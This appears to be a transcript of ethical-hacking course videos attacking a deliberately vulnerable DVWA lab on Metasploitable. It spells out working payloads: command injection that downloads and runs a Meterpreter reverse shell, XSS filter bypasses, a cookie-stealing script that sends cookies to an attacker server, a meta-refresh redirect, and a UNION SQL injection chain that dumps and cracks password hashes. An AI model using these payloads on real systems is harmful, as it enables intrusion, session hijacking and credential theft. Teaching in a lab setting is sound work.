tester.py. And I just named the payload tester, but feel free to name it anything that you want. I will press enter here, and this will create our Python payload. Let me go right here, lower this, and while this is creating, make sure that your burp suite is started up. Also make sure that your intercept is turned off, and start up your Firefox and your Metasploitable virtual machine. Okay, so once you do that, here in just a few seconds our payload should be done. And here it is. Now that we got a payload created, we must figure out how can we deliver it to the target system. Of course we will do that using the command injection, but even then the target must be able to download our payload from somewhere, right? For this, we're going to use Apache to web server and host our payload there. Apache comes with Kali Linux already, so we can make it run real quick. To do that, we must first type sudo and then service apache2 start. It will ask us for the password, we input the password, and this will start our Apache2 web server. What does this mean? Well, this means that any file that is hosted inside of /var/www/html directory in our Kali Linux will be hosted on our web page to anyone that visits our IP address. Let's first of all visit that directory. So if I go cd var www.html, type ls here, and we got shell.exe from some previous video, which we can delete straight away. And this might require root privileges, so let us just enter root account sudo su and let's delete the shell.exe. And now our directory is empty, so no files are being hosted on our web server. Let's copy our tester, which in my case is in my home directory, Mr. Hacker and desktop, tester.py, and we want to copy it inside of var www and html. And now if we were to go to our Kali Linux machine and visit the IP address of my Kali Linux, which is 192.168.1.9, we are going to see this page that has this file available to download. Great. All we're left to do right now is to execute this file on target system. Let's go to our command injection page on our Metasploitable. And to do that, we visit the IP address of Metasploitable, navigate to DVWA. All of this we already know. Let us enter username and password and go to the command injection. But before we do that, change the security level to either low or medium. Once we do that, inside of the command injection, we can execute the commands as from the previous video. So if I type right here 192.168.1.1 and dot and comma and then ls after it, it will ping the router's IP address and it will also print out the contents of that directory. But we don't want to ping every time. We can just type dot and comma, which will specify that we want to enter a next command, and we can just type ls after it, and this will just give us an output of the ls command. And we won't have to wait for the ping command to finish. Now, let's download our payload using wget command. And wget is something that you can run from a terminal in order to download a specific file from the page or link that you specify. Let me show you inside of terminal first. So right now I'm inside of the /home/MrHacker directory, and I don't have the tester.py right here. But if I run the command wget and then 192.168.1.9, which is the IP address of Kali Linux, / and then tester.py, with this link, we are accessing this page right here and this file right here, which will tell our terminal that we want to download that file. If I press enter, it will download tester.py, and if I type ls once again, now we have tester.py inside of our home and MrHacker directory. We want to do the same thing on our target machine. So to do that, we can use dot and comma to specify the next command and type the same command, wget 192.168.1.9 /tester.py. I press submit, and if I run the ls command once again, now we have one additional file, which is our payload. So it is there. It is on the target machine right now with the help of command injection. The last step we have to do is to set up a listener inside of MSF console. So let's do that real quick. And after we set up a listener, we must execute our payload. And here is the MSF console. We are already familiar with setting up of the listener. We're going to use exploit multi-handler, and we need to set the payload to be python/meterpreter /reverse_TCP. If I show options, all we want to do is set the L host and L port, and that will be the IP address of Kali Linux, and the L port will be 6000. The same options that we specified inside of MSF Venom. Then I will run this, and all we're left to do right now is to execute this tester.py with the help of command injection. So let's see how we can do that. If I type dot and comma and python tester.py, press enter, this page will load. And these are good news because that would most likely mean that we got the Meterpreter shell opened. With the help of Python, we executed our Python program on the target machine, and it opened our Meterpreter shell, where we can execute various commands as usual. We can run help command to see what else we can execute, and we can basically perform post-exploitation that we already covered. Great. So this is just another way that you can use command injection to your advantage to spawn a better payload than just a simple netcat command execution. So you can try to test this with our Python payload if you want. Great. Now that we covered the command injection vulnerability, in the next video, we're going to go into cross-site scripting vulnerability. See you there. Welcome back. I want to talk about another vulnerability that we mentioned in the theory video, and that is cross-site scripting. If you remember, this is a vulnerability where we execute code due to poor user input filtering. In this attack, it is not the server that is getting targeted, but the users that visit that website. There are three main types of XSS attack. There is reflected XSS, stored XSS, and DOM-based XSS. And in this course, we will be covering first two, which are reflected and stored XSS. But before we do that, let's quickly remind ourselves of scenario as to how this attack looks like. So the attacker finds an XSS vulnerability, they inject JavaScript code that they want the target to execute inside of their browsers, and then anyone who visits that web page will execute the JavaScript code that you injected. This is an example of stored XSS, where the victim doesn't have to click on any links. All they need to do is to visit the same page on their own, and they will execute that script that you injected. So how does this work? Well, this is possible only in case the script that you injected is getting stored on the server. This would most likely be if there is, for example, a page where you need to type in some type of a comment, and then that comment will show on that page. If that comment input is vulnerable, then you most likely will have a stored XSS, because anyone loading that page after that will load your comment as well, and if your comment was a JavaScript code, they will execute that code. So what does this mean? Well, this means once you inject it, it will stay on the server, and server will host that page with malicious JavaScript code to anyone trying to visit it. On the other hand, reflected XSS is a little bit different. It won't work on anyone that visits the page. It will only work if you send a link with malicious code to someone. In this scenario, the server doesn't store our injected code on their side, so it won't be hosting the page with our code. However, the code injection vulnerability could still exist. If we find it, then we would craft our JavaScript code that we want victims to execute, and we would send those links to anyone that we want. Once they click on the link and open the website page, our JavaScript code will also get executed. Now, these types of attacks are usually used for session stealing or by attackers to mine on targets' PCs and create web botnets. But our goal is to just find the bug itself, and we will demonstrate how cookie stealing works later. Let's get straight into it. Okay, so the thing that we need is our Metasploitable running. I got it already up, and we also need the DVWA page. Make sure that you have burps running with intercept turned off, and once you do all of that, you want to navigate to the XSS reflected right here, because this is the first example of XSS that we're going to cover in this video. Another thing that you want to do is you want to set the security level to be low for our first example. And let's give it a try to figure out whether this even has an XSS vulnerability. So what does this application do? Well, here it asks us to input our name. So I'll just go and type here Alexa inside of this input, just to see what happens. So if I click on submit, okay, so it prints out hello Alexa. What a welcoming application, right? And this right here is an example of how it should work. You type in your name, it will welcome you with hello and then your name. However, what happens once we try to inject JavaScript code? The most simple JavaScript code, and what we usually do first once hunting for XSS, is type this code. So let me go in terminal just so you can see it better. So this arrow to the left, then script, arrow to the right, alert, and inside of the brackets we put 1 between single quotes, or you can actually put anything you want, and you close the script tags. And this right here is a JavaScript code. It tells the page to alert us with number 1. And once again, you can specify anything between these quotes. So what does this mean? This means it will open that small pop-up window at the top of the page where it should print out 1. And these script tags right here are just a way for us to tell the web page, hey, anything that's inside of these script tags, you should read as JavaScript code and not HTML code. And this at the end is just the closed script tag, which is telling the web page, here is where JavaScript code ends. This alert is a JavaScript function that will alert whatever is inside of these brackets. So let's give it a try, and let's input this inside of our user input instead of a name. I will copy it, go to my page, and paste it right here. So script, alert, and closed script. I click on submit, and here it is. we have XSS vulnerability since it ran our code and it opened this small window. We can see it says 1, which is what we alerted. Well, this was pretty easy. Since this was on low settings, we can assume no user input was filtered, therefore we managed to execute this. And as easy as this looks like, there are many pages that are currently on internet that are vulnerable to this type of bug, even with this simple script. And as harmless as this looks, it can be used to do some serious damage on client side, depending on what exactly you send them as JavaScript code. Let me show you what I mean. What you would do after actually creating the XSS vulnerability and finding it, you would copy the code with the JavaScript code that you injected, and anyone that clicks on the link, so I will just simulate right here someone clicking on a link, they click on the link that you sent, they press enter, they will also execute that JavaScript code. As we can see right here, they will also get a pop-up window that says 1. And this is a reflected cross-site scripting attack. Anyone that opens this link will also execute this. They don't have to type the JavaScript code themselves. Now that we did this, let us also take a quick look at the source code of this page. So I will open view source, and here is the PHP code for this specific page. And they just paste our input right here. They don't perform any filtering whatsoever. Now that we covered the low security level, let's try to find XSS in a medium level security to see if it works. So I will close this, go to the DVWA security, and I will change from low to medium. Click on submit, and this will change everything to a medium. So let's go back to XSS reflected, and let's first type the name to see whether it gives the same output. And it does. It prints out hello and then the name. So now let's try the same script that we did with the low security. So open script tags, I will alert 1, and I will close script tags. Click on submit. It seems that they actually remove the script tags. We can only see right here hello alert 1, and it doesn't give us a pop-up window that says 1. This means there is some type of filtering performed onto this page, because we don't get that window and our code doesn't get executed. By the output of our application, we can assume that the filtering performs removing of script tags. And usually this is type of filtering that you will encounter. Why? Well, because script tags automatically mean to the web page that JavaScript code is coming. So some web pages perform filtering just by removing these script tags. But let's see whether they filtered it well enough. They seem to filtered script like this, but have they filtered script like this? What if I write it in capital letters? Will that also be filtered? Let's give it a try. If I type script and then alert, and I also close the script with capital letters, click on submit, and here it is. We got it to run once again. So all we had to do was write scripts in capital letters. They only filtered out lower lettercase script. Let's make sure that that is the case by going and visiting the source code, and let's see what did they do. And here it is. Inside of the print statement, they used the string replace function onto the script tags and replaced it with empty space. And that is the reason why with the first example, we didn't get script printed out, we only got alert 1 printed out, since they removed our script tags. But we managed to bypass this with capital script letters. But what would happen if they, for example, also filtered the capital script letters? Well, then we could do something like this. We could type, and let me write it first in terminal just so you can see it better. We could write something like this, SCR, and then open another, left arrow, script, close right arrow, and then IPT, close another, right arrow, alert 1, and close script tags. And the reason why we are writing script tags like this is because our web page only filters the opening script tags. It only filters this. It doesn't filter closed script tags. So what did we do right here? Why would this work? Well, before I explain it, let me first give it a try onto the web page just to see if it would work. And it does indeed work. So what I essentially did right here is I split this script tag into two pieces. And what the web page does, it only filters out entire script tag. So what the web page would do is it would see this opening bracket, then script and closing bracket, it would remove it, but then we would still be left with a script tag. So if I go right here, and let's pretend that we're at the web page, we'll filter out the opening script tag, so let's remove this. And what do we get? Well, we get another opening script tag that won't be removed. And that is why this would work as well. Great. Now let us see the attack where we steal cookies from the person that visits our link. Those cookies could then be used to steal their session and possibly enter their online account on that website if the website session management is also poor. Right now, we will see only how to get that cookie with cross-site scripting. So to do this, we must first see where are we going to receive the cookie value. So they will execute the code and our code will extract the cookie, but where is it going to send it? For this, we're going to start a small Python HTTP server that we will send the cookie to. So how to do that? Well, we can go inside of our terminal and just type the command python-m and then simple HTTP server and then the port number where we want to host it. Let's say port number 8000. If I press enter, this will start the HTTP server on all interfaces on port 8000. Then the malicious JavaScript code that we want to inject is this right here. I will first write it in another terminal and then we're going to copy it inside of the page. So we must first start with capital script. Because we are on medium level, the regular script won't work. Then we can type document.write, open brackets, then type one single quote, open another left arrow, and image source equals, open double quotes, HTTP / and then the IP address of our Kali Linux machine, and then the port on which we are running that Python server, which in my case is 8000. Then we can add another / and close single quote. After it we add a plus and then document.cookie. After that, space and another plus, and after that comes single quote, space, double quote, close right arrow, another single quote, close bracket, dot and comma, and then the close script tags. Okay, I know what you're thinking. What even is this? And this can be a little bit challenging for someone who never encountered JavaScript before. However, this is just JavaScript syntax. It's just the programming language. And after a few times trying XSS, you will pretty much get used to it and it won't be that weird looking once you write it. Since I assume that for anyone that hasn't encountered this before, this looks pretty terrible. But what we are essentially doing right here is we are opening script tags in capital letters because of the filtering on our page, and then we are writing the document.cookie, which is the cookie session of the user visiting that page and running this code, and sending that to the IP address on port 8000, since that is where we are running our Python server. And here we should get printed out the cookie session ID once someone visits our link with this JavaScript code. And at the end, all we are doing is we're closing the script tags. So let's give it a try and run this in our user input, copy it once again, go to our page and type it here. If I press enter or submit, well, nothing seems to happen right here, but if I go to my web server, here it is. Here is our target's cookie. Here is PHP session ID, and that is the cookie value. It even tells right here that we got the security on medium. And this is something that we might be able to use to steal their session. However, more about that later. For now, we saw how to find an XSS vulnerability in both low and medium security level. As I said, this can be one of the challenging parts of the course. However, if there is anything you don't quite fully get, feel free to post a question so we can clarify it even more and make it understandable. Great. In the next video, we're going to do this same vulnerability, just we're going to see how it would look like if it was a stored XSS. Remember, this what we covered is called reflected XSS, and the target will only execute the code if they open the link with our JavaScript code. In the next video, we'll see the vulnerability where the JavaScript code gets stored on the server itself. Welcome back. And it is time that we cover another version of XSS attack, which is called stored XSS. In the previous video, we covered the reflected XSS, and this is pretty much the same thing. It is the same vulnerability, just this time our code will get stored on the server side. And it is more dangerous because everyone that visits that page from the time that we injected our JavaScript code will also run that code. You don't have to send them any link or anything else. The code will run by itself as soon as they visit that page. And we already know where we can find the example of stored XSS, so let us just go to our Metasploitable IP address in the DVWA and let us log in. As usual, make sure that your burp suit is running and make sure that the intercept is turned off. I will zoom this in so we can see everything better, and let us first navigate to the DVWA security and check low right here. After we do that, let us submit and go to the stored XSS. So once again, this is the same vulnerability. We want to inject JavaScript code in user input fields. So what do we got here inside of our application? Well, it asks for name and message. Vulnerability stored cross-site scripting. And why is this stored? Well, if we take a look at down here, it seems that someone already made a comment. Name is test, and the message or comment says this is a test comment. And you might already see why this is stored. It is already on the page, and anyone that visits this page will also see this comment. So this is something that everyone that loads the page will also load this comment as a string. But what happens if we try to, for example, input JavaScript code? Will they also load that? Yes, they will. Let me show you an example. First, let us create a regular comment. So I'm just going to type Alexa and hello there, can you see me? And let's sign guestbook, and we can see right here our comment has been added. So everyone will also be able to see this. But what happens if we, for example, try to inject JavaScript code? Let's go with simple alert script. So script, alert, and if we continue typing, we will notice that we cannot really type anymore in this field. So it could be that this field is limited to only certain amount of characters. So let's just leave that on test, and let's try to inject the code here. If I go onto the script, then alert, and I alert 1, and I closed the script tags, here we can input the entire script. So let's sign guestbook, and our JavaScript code executes. There is no user input filtering. Therefore, since we are on low level, we will inject a simple code as alert1. Now, the good part about this is that now, since this comment has been added to this list, every time we visit that page, every time they will execute our code, or we will execute our code. So we don't have to type it once again, as we had to with XSS reflected. Remember, if we type inside of the reflected a simple alert script, it will execute, but once we change a page and go back to the XSS reflected, there is no code running. However, on stored, we will run this code every time. And that is why it is more dangerous. For example, if you did the same attack as from the previous video where we stole cookies, if you inject that code here, then anyone that visits this page, their cookie will be sent to you. And you can then perform session hijacking or something else if cookies aren't configured correctly. And this will also happen if we log out of the page. For example, if I go log out and I go back to the page and go back to the XSS stored, this executes once again. Now, if this starts getting annoying because you want to start testing other examples as well, what you can do is you can go to Setup right here and Create or Reset Database. Once you click on this button, navigate back to XSS stored, you will no longer have the comments that we added in this video. You will only have this test comment that is there by default. Okay, great. Now let us take a look at the medium level security. So if I go on medium, submit, go back to the XSS stored, and I try to input right here, it still seems to be limited characters. So we can't type longer words than this. Let's give it a try right here. So script alert 1. And here we can name test. It doesn't work. It seems that we get these slashes before our single quotes. So let's take a look at the source code just to see what is happening inside of our fields. And it tells us right here in the comments that this code right here sanitizes the message input, or in other words, the comment input, and this sanitizes or filters the name input. So it seems that we have this HTML special chars function onto our comment, and usually once you have that, there will be no XSS vulnerability since it filters all the characters that you can use to perform XSS attack. So most likely this part doesn't have any vulnerability. So message input or comment input is not something that we are going to try to attack. But what about this name input? It only has this string replace regular script with empty space, which we saw in the previous video. We can simply just bypass this with capital script tag. But there is another problem that we encounter. We cannot specify more than a couple of characters in the name field. Is that something that we can bypass? Well, if I type like this, I will not be able to type more than this, but if I go and inspect element of this page, I find the name input right here, and I can do that by going right here on dev, navigating to here, navigating to form, then from the form, this table, and I want to select this name input right here. So let us give it a try and see which one it is. It is this first one, and if I click on this last arrow, we can see right here that once we select the name input field, right here we got the max length of 10. Is that something that we can change? Well, let's give it a try. If I select that and instead of 10 I type 100, press enter, and I try to continue typing, well, now it works. We navigated to this field, we found the input name field, and it said the max length was 10, but we just added another 0, and now we can type even more characters. So let's give it a try. Remember, the only filtering that is inside of the name field is the script tag, so let us make it capital. And here we can type anything since we know that this is most likely not vulnerable to the XSS attack, and if I click on sign guestbook, there it is. Here is our XSS vulnerability. And that is all about stored XSS. It is completely the same as the reflected XSS, just this will get stored on the server page, and anyone will load it once visiting that page. Great. Now that we covered XSS, in the next video I want to talk about a small vulnerability that many penetration testers skip when testing for web application vulnerabilities, and that is called HTML injection. And we're also going to mention why we should never skip checking for the HTML injection. See you in the next video. Welcome back. I want to quickly talk about another vulnerability or a bug, which is called HTML injection. And it is quite similar to the cross-site scripting attack. Just as its name says, in this type of the attack, we're not injecting JavaScript code, but instead we're injecting HTML code. And you might say that that is not really dangerous. However, even though that is correct, HTML injection is still a bug that you should be searching for. Why? Well, if there is an HTML injection in some big company, what an attacker could do is they could change the entire page look. They could add whatever they want to that page. They could post different pictures. They could completely change that web page to their own liking just by injecting HTML code. And that would be pretty bad for that company because someone else would have a complete control of how that page would look like. So how can we test for that? How can we find HTML injection? Well, you can just go and navigate to the XSS reflected and XSS stored that we covered in previous videos, and we can test for HTML injections here. So usually what you want to test is different HTML tags such as h1, h2 or different header tags just to see whether your input will be interpreted as HTML code. So let's give it a try. Everything is on low, and if I go right here and just type h1, which is an HTML tag for header size 1, and I type test, close the HTML tag by typing these arrows and then closed h1, I click on submit, and we can see it does indeed interpret our input as an HTML code. If we were to type, for example, h2 or h3 and then test once again, this would be smaller size, which is a good enough indication that there is an HTML injection on this page. Now, there is no point of us changing this to medium or high because this specific input is used for JavaScript attacks, so only JavaScript syntax will be filtered, therefore HTML injection will be the same on medium level security as well. As I mentioned, this is also a bug and it should be reported because for now we only typed in a small HTML code which changes our input to size 1 header and size 3 header. But what we could also do, for example, on a stored page, and let me just reset the database real quick from the previous video where we covered the XSS stored. And if you were to type an HTML injection right here, let's say the name will be test, and here we type this code. Let me first write it inside of a terminal and then we're going to copy it to this page just so you can see everything better. So open brackets and then meta HTTP equiv equals open double quotes refresh close double quotes content equals 0 dot and comma and then space URL equals http://google.com and then close double quotes and close the tag by typing slash and close right arrow. If we were to inject this code, well, let's just see what would happen. Let's copy this code right here, go to our page and type it here. I click on sign guestbook and do you see what is happening? It is constantly trying to go to a different page and it is constantly refreshing that page. It pretty much made the page completely unusable because we cannot even go up here and type something in. So what we must do is we must change to a different directory such as file inclusion and go and clear our database or reset the database because we will not be able to visit the stored since it will automatically start refreshing the page and trying to visit google.com. However, if we were to type same right here in the reflected and we were to change, for example, from google.com to facebook.com and click on submit, well, pretty much the same thing would happen, but for some reason it doesn't want to visit facebook.com, and we're going to take a look at why that is. Let us see whether we specified something incorrectly. So URL equals HTTP. Okay, so I've tested it out and for some reason it doesn't seem to work on Kali Linux browser, but if I go to my Windows 10 machine and I visit the Metasploitable page and right here I copy the same code that we just sent in our Kali Linux, just we copy it and try it from our Windows 10 machine. I just changed the URL to be bing.com, paste it right here, and click on submit. Well, now it fully redirects our access reflected input and the entire page to this Bing.com website. Let's give it a try what happens if we do that on the stored. So I type test as name and I type this command right here as a message, and it appears that there is a limitation of characters right here. So what we can do is we can inspect the element, navigate to the body, then let's go and find the message input. So under the form, we go table, body, and message input. We check right here. It says that the max length is 50. So what I can do is I can type 500. And now if I go and try to copy this, so I will just delete all of this, paste the code and click sign guestbook. Well, now it actually redirects. So you will see that even when I try to go back and I go, for example, to brute force and again on access stored, it will just load Bing.com. So with the help of code injection, we can even redirect pages to different websites. And this is usually what attackers do. So if they find a stored code injection vulnerability, what they will do is they will just inject a redirection link to a different website, possibly a malicious website, or a website where they advertise something or something similar. And every time someone visits a page, for example, they want to go and access stored on our Metasploitable page, well, they just load Bing.com. And that is the power of HTML injection vulnerability. So now that we covered this, in the next video, we're going to go on to another big vulnerability, which is called SQL injection. See you there. Welcome back. Let's talk about another big vulnerability in web applications that involves databases and that is called SQL injection. So we already talked about how this works. So you find a user input on a website that communicates with the database. Usually those inputs are something like usernames or passwords or a page where you're searching for some type of a product. Once you input product, the website communicates with the database to see if it has it. Then the database responds back, and all of that is done with the help of SQL language and SQL queries. But as usual, user input might not be well filtered, and we might be able to inject SQL code there and send our own SQL queries to the database. Maybe on that website there are online accounts and their passwords are stored in a database. If we were to find SQL injection on a website like that, we could potentially extract usernames and passwords of all of the accounts through that SQL injection. This is an example of how an SQL query could look like. It is very similar to English language, and what this statement essentially does is it selects some type of element from a table where some condition is fulfilled. And table is just a part of database. Databases are consisted of tables and columns. Now, I will be real right here. If you're encountering SQL injection for the first time or SQL language for the first time, you might find this a little bit hard. However, through practice, this will become easier and easier. Here we can see an example of how a real-world SQL query could look like. Here, books are our table from the database, ID is our condition, and this star sign indicates that we want to extract everything. Usually in programming world, star sign means everything. Great. Now that we know behind the scenes of how an SQL injection works, let's try to perform one on our DVWA page. So let's go right here, log in as usual to our DVWA page. And let's first select the DVWA security to allow and navigate to the SQL injection. Now, you might notice that we also have SQL injection blind, and this is something that we're going to talk about later on. For now, let's just focus on this SQL injection tab. So what do we have right here? We have something called user ID. And usually we would input something like a number right here. So let's give it a try. If I, for example, input number 1 and click on submit, well, it will tell me that the ID of 1 is a user with the first name admin and surname admin. And that user has ID 1. What if we type 2, for example? We click on submit. Well, we got a user with ID 2. His name is Gordon and his last name is Brown. And we can go for each and every number if we want. For example, the ID 5 has first name Bob and last name Smith. But to search for the SQL injection, what we can do is we can type some special characters, and that might throw an error if there is an SQL injection. For example, if I type apostrophe or a single quote and I click on submit, it will throw me this error. It will say you have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near line 1. And this already is an indication that we have SQL injection bug, since it interpreted our apostrophe as a part of SQL syntax. So for now we know that there is an SQL error because we got an SQL error syntax, but before we continue, let's first explain why does this give an error? Why using a single quote gives us an error? Well, let me show you like this. If I open terminal, let's just go and find a program that will allow us to write text. And here we got some text editor under the usual applications. I'm going to open that and I'm going to enlarge it just so we can type something right here. And now that we open this, let's explain why apostrophe gives an error in SQL syntax. Well, as we already mentioned in our slides, usually we will have an SQL syntax or an SQL query that will look something like this. So select and then something from a certain table where some condition is fulfilled. And for our page right here, if I go back, since we have user IDs, first names and last names, it could possibly look something like this. So select name, comma, surname from the table that could be named something like accounts, we don't know that yet, where ID equals, and then the ID number goes between single quotes. So this could possibly be our SQL query that we send to the database, and then the database retrieves the user under the ID 2. But what happens when we type apostrophe is instead of these 2, and instead of it filtering the apostrophe, it just writes it between these 2 single quotes. And then we get 3 single quotes. The opening single quote, and then our single quote that we injected becomes the closing single quote, and then the third one is the single quote that's hanging. It doesn't belong to anything, therefore the SQL throws an error that it has 1 single quote more than it should have. And whenever that happens, you got an SQL injection bug. And this is also called the error-based SQL injection because it throws us an error. On the other hand, we got the blind SQL injection that doesn't throw an error, so there are some other methods that we must use for that one in order to figure out whether it exists. Now that we know that there is an SQL injection, what we can do is we can type some other statements as well. For example, we can select the ID number 2 and then close the single quote inside of that SQL query, and we can type some logical statements such as, for example, and 1 equals 1. And keep in mind that this right here, if I copy it and write it down, has single quotes between the numbers. And it doesn't have the single quote at the end because inside of our SQL query, we already have a single quote at the end. So this single quote will cover the last part of this one, and this first single quote will cover the first part of these 2. So essentially, once added to our SQL query, it would look something like this. Instead of this single quote, we would have this. And you can see this opening and closing single quote fulfills our statement. Let's give it a try and run this. And we will just get the information about user under the ID 2. And that is because our statement is correct. So we select the user ID 2 and we say do that in case 1 is equal to 1. And 1 is equal to 1, so there are no problems, it just prints the username. But if we were to type the same command, just change 1 equals 2 and click on submit, we wouldn't get any output right here. That is because 1 is not equal to 2, therefore it won't print the user under the ID 2. that could be another sign that there is an SQL injection. Now that we know for sure that there is an SQL injection, we can try some other commands, such as for example this one. So if I go down here and type 2, single quote, and this is just us selecting the ID number 2, and then use a statement called order by 1, and add dash dash, then space and single quote at the end. So let's explain this command. The reason we have this dash dash, space and then single quote is because that is referred to as a comment. This dash dash is a comment, and we must add this at the end of our statement, at the end of our SQL query, because otherwise it would throw us an error. We must have it so we don't get error when running our SQL commands. And order by 1 will just check whether there is column 1, and we are going to do that for 2, for 3 as well, and we're going to see how many columns do we have. So if I copy this and go back to here, paste this, click on submit, we'll get an output first name Gordon and surname Brown. That means this is a valid statement. Let's try with order by 2. So just change from 1 to 2 and click on submit. And this is also a valid statement because we get the first name and surname. And if we try number 3 and click on submit, well, there is an error, unknown column 3 in order clause. And that's how we know that we have 2 columns. Now, let's see what those 2 columns are. If I go and type this command, and I'm going to type it right here first, 2 as our ID, and then union select 1 and 2. And let's not forget our comment at the end by specifying dash dash and then single quote. If I copy this and I paste it right here, click on submit. Okay, so we get this output right here. The first name for the ID 2, and we get the first name 1 and surname 2. Now that we know that we have 2 columns and that we have an SQL injection vulnerability, we're going to start extracting data. So we know that we have 2 output fields, the first name and the surname field. So we're going to try to extract the database name and the user of the database. To do that, we can type the command to select the user ID and then union select, and we're going to type database open and close brackets and comma user open close brackets. At the end, we add our comment with a single quote, and here we are specifying the functions called database and user. These 2 functions are already defined in MySQL. So let's copy this command just to see the name of the database and the name of the user and type it right here. And we get the first name, which will store the database name, which is DVWA, and the surname or the user, which is going to be root at localhost. Now that we know this, we can try to extract the list of the databases by injecting the following command. So after this, we once again start with 2 and then union select. These select statements you can also type in capital letters. It doesn't really matter. You can type capital or lowercase letters. What matters is that you type the correct command syntax. So right now we're going to call for Shima underscore name, comma 2 from information underscore, and let me just enlarge this so the entire command can fit. So 2 from information underscore Shima dot Shimata dash dash and then close single quote. Okay, so let's just copy this and see what do we get with this command. If I copy, go to my page and paste it right here, well, we get quite a few results back. And we essentially get different databases outputted right here. We got our DVWA database, we got Metasploit database, MySQL database, OWASP 10. And since we're doing this all inside of the DVWA application on our Metasploitable, we would most likely be interested in this DVWA result. So let's try to extract even more from it. We can use the following command, which is ID2 and then union select table underscore name, comma, to from information underscore schema dot tables. So you might be wondering what even are these, and this is just regular syntax for the SQL language. These are just something that you will get used to over time. Once we type from information schema dot tables, where the table underscore schema is going to be equal to the one that we want, and in our case that is dvwa. So we can just type equal open single quote dvwa close single quote and then our comment dash dash quote. Let's copy this entire command, copy it and paste it right here. Now I'm not sure if I copied the entire command, so I'm just going to go back and add what's missing, which is to and then single quote and then union. Click on submit. And here is the output. So with this command, we sent a query where we requested names of all the tables inside the DVWA database. We got two results, which is guestbook and users. And this users right here could be interesting for us, so let's dive deep into it. We want to extract columns inside of this users table. We can do that by injecting this command right here. So let me just make a few spaces and type the next command, which we, as usual, start with to and then apostrophe, union, select, and now we're selecting columns, so we are going to type, instead of table name, we're going to type column underscore name, comma, column underscore type, from information underscore schema dot columns. Remember in the last command we used dot tables, now we are using dot columns because we are furthermore diving into our database and we need a condition at the end, so where table underscore schema is going to be equal to dvwa and table underscore name equals users. So remember, we got two results right here, and we want to go with the users one first, because that looks more interesting to us than this guestbook table. Okay, so let's copy this command, and now I'm going to copy the entire command. So select, copy, and paste right here, and click on submit. And again, we get a lot of results. Here they are. Can you guess which one out of all of these columns are most interesting to us? If you guess the password one, well, you guessed right. But we also want to extract other columns as well, such as usernames, which we get right here, such as first names, last names, IDs as well, and all of that we want to extract. To do this, we will need to use the concat function, because we only have two fields available to input our result. So we must concat a few results in one field and the rest of the results in the other field. We can concat, for example, user ID, first name and last name in the first name field, and we can concat the usernames and passwords in the surname field. So let's see how that command would look like. If I go back and add a few more spaces, let's type to and then apostrophe, union, select, and then use the concat function to concat multiple fields into one, and we can do that by specifying which fields we want inside of this function. Let's type user underscore ID as a first field, comma, and we're going to separate them with two dots. So comma, and then first underscore name, which is going to be our second field, comma, let's use again two dots to separate that also from the last name. And these are the three fields that we're going to concat into first result. Then after it, we want to type comma and concat the usernames and passwords into second result. So let's type it like this, password. And at the end, we must specify from where are we extracting all of this. And in our case, since our database is called DVWA, we're also accessing the users table. So we must type it like this. So extract all of this from dvwa.users. add the comment at the end. And let's copy all of this. And submit. Well, here it is. Here is all of the information about all of the users from this database. In the first name field, we get the user ID, followed by the first name, followed by the last name. And in the surname field, we get the username and the password. So we successfully performed SQL injection and we extracted all of the information about all of the users inside of their database. But you will notice that passwords are rather strange, right? This is because they are hashed. Usually, websites store hashed value of passwords inside their database for security reasons, since even if something like an SQL injection happened, and someone managed to extract the entire database, they wouldn't get passwords in plain text, but rather as hashed value that they need to run a dictionary attack on in order to find it in plain text. And by looking at them, I would say that this is probably MD5 hash. We can figure this out by copying one of these passwords, so let's go with this one for example. Going to Google and just pasting it inside of the search bar. And we can see most of the results are MD5, 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 so we can guess that this is an MD5 hash. And since this is an easy password, if I click on this link, it will even tell me which password this MD5 hash is. So it is the password ABC123. So if I go back to this page, we can conclude that Gordon has a password of ABC123 because this website showed us what is the string of this hash that we pasted. We can do that for any other hash as well. As long as it is a simple password, it should manage to find it online. If I go and paste this one, for example, go right here, click on this website, MD5 hash for password is this. So it seems that our MD5 hash is a string of password. So our user called admin has a password that is simply just password. And that is how you extract the entire database with the SQL injection vulnerability. Now, this is probably the hardest bug that we are going to cover inside of our web application section. And it might take some time for you to get used to it and to get used to all of this SQL syntax that we performed right here. For example, these database functions, user functions, could be known by someone that already knows SQL, since these are already the inbuilt functions, and that also stands for all of these syntax like table name, like information_schema.columns, and the rest of these commands. But if you practice it more and more, you will eventually get better at performing SQL injection. Okay, great. So we performed SQL injection, and in the next video, we're ready to continue discovering even more bugs on our DVWA application. See you there. Welcome back. In this video, I want to talk about a vulnerability called CSRF, or also known as cross-site request forgery. Now, this is something that you might remember from the scanning section of the course, where we used Nmap to discover vulnerabilities, and on one of our targets we got response that possible CSRF vulnerability was there. Well, the time has come to finally see what is this vulnerability. Many people think that this is something similar or the same as XSS or cross-site scripting, but that is not the case. In cross-site request forgery, the attacker makes the identified user execute something that they didn't want to execute. CSRF attack can be used to exploit any web function that searches for one request inside of the identified session in case the security applied isn't efficient enough. Some of the things that you can do with cross-site request forgery would be something like changing details about a specific user, like email addresses, date when they were born, and so on and so on. You can also perform fake banking transactions, adding items to buy on a certain page, but this is not something that we can accomplish easily. For this attack, we need a victim that has active identified session inside of the website, and they will also have to visit our URL link that we craft in order for this to work. Now, let's take a look at a simple example of how to do this on our DVWA page. So start your Metasploitable, visit the page as usual. We want to go to the DVWA and we can log in right here. But remember that we did the SQL injection? We no longer have to log in as admin user. We can log in as any other user from the data that we extracted with our SQL injection. So if you remember, we had a user called Gordon who had the username of Gordon B, and his password was ABC123. If you remember that we got his MD5 hash, then we pasted it inside of the Google, and we got that his hash was equivalent to a string of ABC123. So we can log in as Gordon. And we can see down here, you have logged in as Gordon B. Now let's set the security to low. And let's navigate to CSRF right here. So we can see vulnerability, cross-site request forgery, and the application requires us to change our admin password. So we got the new password and confirm new password. What we can do is we can, for example, type password 123 and confirm password to be password 123. If I click on change, it says password changed, and let's see whether it indeed got changed. So if I log in as admin and then password, remember that before it was just password, now it is password 123. If I log in, well, now it will work. We successfully changed the password. But how can we use this to exploit it? Well, if I go right click and go on view page source, there will be a vulnerable part of code inside of this page. And that part of code will be the form where we submit the new password. If we scroll all the way down, here is the part of the code that is vulnerable. We got the form where we can submit the new password, where we can also reconfirm the new password, and you will notice that this is under the vulnerable code area. So what we can do with CSRF is we can copy this vulnerable form where we submit the username and password, and we're going to create our small HTML page that we're going to host on our Apache 2 web server. And you're going to see in just a second why we do that. So I'll open a terminal and I will navigate to the directory of our web server. And if you remember, that is /var/www/html. Now, since we can't write files right here as a regular user, let us enter the root 